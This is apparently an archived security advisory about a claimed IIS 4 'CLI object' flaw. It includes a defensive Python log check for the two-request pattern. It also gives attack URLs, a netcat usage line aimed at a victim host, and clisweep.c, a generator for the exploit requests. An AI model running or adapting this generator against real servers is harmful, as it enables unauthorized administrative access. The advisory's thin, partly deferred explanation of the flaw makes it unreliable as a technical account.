COMMAND

    CLI objects

SYSTEMS AFFECTED

    IIS 4

PROBLEM

    'shinex' found  the following.  While  doing a security  audit on a
    WinNT   4.0   system,   he   discovered   an   `object  collision`
    vulnerability that can potentially lead to remote compromise.

    The flaw lies in the  mechanism employed by CLI objects  to handle
    dynamic  pre-auth  requests  from  a  stateful  client.  States of
    operation are inherent  in the implementation  itself.  This  flaw
    could  lead  to  a  determined  attacker  gaining   administrative
    privileges on servers using this widely deployed object kit.

    Request #1:

        http://www.victim.com/.....~518 chars.../[invocation of CLI object]

    Request #2:

        http://www.victim.com/.....~260 chars.../[request with req1 object as ext]

    Simple as that.  It is  important that both  requests reach the
    target server  within a window  of roughly 15  seconds (a  rough
    estimate; the  threshold may  vary from  server to  server).  The
    second request  takes the  base name of  the object  from request
    #1 as its extension.  Subsequent requests  are then made with the
    raised authorization level.  The rationale for the char  padding
    will be available later.
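    The advisory describes a pattern an operator can look for  in the
    web server logs: two dot-padded requests from the same client  in
    quick succession, where the extension of the second is  the  base
    name of the object named in the first.  The check below is  added
    here as an example and is not part of the advisory or of shinex's
    clisweep.  It assumes a simplified W3C-style log line (date, time,
    client  IP,  method,  URI  stem,  status),  treats  any  run of at
    least 200 dots as padding (the  ~518 and ~260 figures  above  are
    rough), and  uses constructed log  lines with a placeholder object
    name `widget.cli` and made-up client addresses.

```python
import re
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=15)  # rough delivery window quoted in the advisory
MIN_DOTS = 200                  # assumption: anything this heavily padded counts as suspect

# Simplified W3C-style line: date time c-ip cs-method cs-uri-stem sc-status (an assumption).
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\d+)$")
# URI stem of the form /<dots>/<leaf>, with at least MIN_DOTS dots.
PADDED_RE = re.compile(r"^/(\.{%d,})/([^/]+)$" % MIN_DOTS)


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    date, time_, ip, method, stem, status = m.groups()
    return {
        "ts": datetime.fromisoformat(f"{date} {time_}"),
        "ip": ip,
        "method": method,
        "stem": stem,
        "status": int(status),
    }


def padded_request(stem):
    """Return (dot_count, leaf) when the stem is '/<dots>/<leaf>', else None."""
    m = PADDED_RE.match(stem)
    if not m:
        return None
    return len(m.group(1)), m.group(2)


def find_pairs(lines, window=WINDOW):
    """Correlate the two-request pattern per client.

    A hit is (ip, stem1, stem2, seconds_apart): both stems are dot-padded,
    the extension of stem2 equals the base name of the object in stem1,
    and the second request arrived within `window` of the first.
    """
    pending = {}  # ip -> list of (ts, object_basename, stem) candidates for request #1
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        padded = padded_request(rec["stem"])
        if padded is None:
            continue
        _, leaf = padded
        base, dot, ext = leaf.rpartition(".")
        # drop candidates that are already outside the window
        cands = [c for c in pending.get(rec["ip"], []) if rec["ts"] - c[0] <= window]
        for ts1, base1, stem1 in cands:
            if dot and ext == base1:
                hits.append((rec["ip"], stem1, rec["stem"], (rec["ts"] - ts1).total_seconds()))
        if dot:
            # this request may itself be request #1 of a later pair
            cands.append((rec["ts"], base, rec["stem"]))
        pending[rec["ip"]] = cands
    return hits


def _stem(ndots, leaf):
    return "/" + "." * ndots + "/" + leaf


# Constructed sample log; object name, addresses and times are made up.
SAMPLE_LOG = [
    "1999-06-20 10:15:02 10.0.0.5 GET /default.htm 200",
    "1999-06-20 10:15:07 10.0.0.9 GET " + _stem(518, "widget.cli") + " 200",
    "1999-06-20 10:15:09 10.0.0.7 GET " + _stem(260, "AABBCC.widget") + " 200",  # other client
    "1999-06-20 10:15:11 10.0.0.9 GET " + _stem(260, "AABBCC.widget") + " 200",  # 4 s later: pair
    "1999-06-20 10:16:00 10.0.0.9 GET " + _stem(260, "AABBCC.widget") + " 200",  # too late
]

if __name__ == "__main__":
    for ip, first, second, secs in find_pairs(SAMPLE_LOG):
        print(f"{ip}: {first[:12]}... then {second[:12]}... after {secs:.0f}s")
```

    The window is  applied per client  address, so two  padded requests
    from different hosts never pair up, and a second request  arriving
    after the window is  not flagged; widen  WINDOW if your  server's
    threshold turns out to be longer than 15 seconds.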

    /*
    ** clisweep.c by shinex (efnet)
    ** Quick generator for IIS4 CLI extension vuln URLs.
    **
    ** $ (./clisweep <cli object> ; cat) | nc www.victim.com 80
    ** OK. This code is buggy, because I mistakenly thought
    ** that both requests would be delivered without having
    ** to restart netcat. I can't code network apps. Sorry.
    **
    ** Build with -DSCRIPTKIDPROTECTION to actually emit the requests.
    */
    
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    
    #define DOT1 518            /* padding in front of request #1 */
    #define DOT2 260            /* padding in front of request #2 */
    #define THRESHOLD 15        /* seconds between the two requests */
    #define RANDFILE "AABBCC"   /* arbitrary file name for request #2 */
    
    char *gendots(int);
    char *calc(const char *);
    
    int main(int argc, char *argv[])
    {
        char req1[1024], req2[1024];
        char *second;
    
        if(argc != 2)
        {
            fprintf(stderr, "Usage: %s <cli object>\n", *argv);
            return -1;
        }
    
        second = calc(argv[1]);
        if(second == NULL)
        {
            fprintf(stderr, "%s: object name needs an extension\n", *argv);
            return -1;
        }
    
        /* HTTP/0.9-style simple requests, one per line, as in the original */
        snprintf(req1, sizeof req1, "GET /%s/%s", gendots(DOT1), argv[1]);
        snprintf(req2, sizeof req2, "GET /%s/%s", gendots(DOT2), second);
    
    #ifdef SCRIPTKIDPROTECTION
        printf("%s\n\n", req1);
        fflush(stdout);         /* push request #1 out before sleeping */
        sleep(THRESHOLD);
        printf("%s\n\n", req2);
    #endif
        return 0;
    }
    
    /* Return a NUL-terminated run of `num` dots in a static buffer.  The
    ** buffer is reused, so copy the result before calling again.  The
    ** original never terminated it, so the second (shorter) call still
    ** returned leftover dots from the first. */
    char *gendots(int num)
    {
        int i;
        static char dots[1024];
        char *ptr = dots;
    
        if(num >= (int)sizeof dots)
            num = (int)sizeof dots - 1;
    
        for(i = 0; i < num; i++)
            *ptr++ = '.';
        *ptr = '\0';
    
        return dots;
    }
    
    /* Build the name for request #2: RANDFILE with the base name of the
    ** CLI object as its extension, e.g. "foo.cli" -> "AABBCC.foo".  Works
    ** on a copy so argv[1] is left intact; returns NULL when the object
    ** name has no extension (the original had no check here). */
    char *calc(const char *arg)
    {
        static char file[1024];
        char base[1024];
        char *ptr;
    
        snprintf(base, sizeof base, "%s", arg);
        ptr = strrchr(base, '.');
        if(ptr == NULL)
            return NULL;
        *ptr = '\0';
        snprintf(file, sizeof file, "%s.%s", RANDFILE, base);
        return file;
    }

SOLUTION

    Microsoft has  been notified  and patching  information should  be
    forthcoming.  While not as severe as the RDS vulnerability, it  is
    still  an  avenue  of  attack  that  could  provide  a  determined
    attacker with unauthorized access.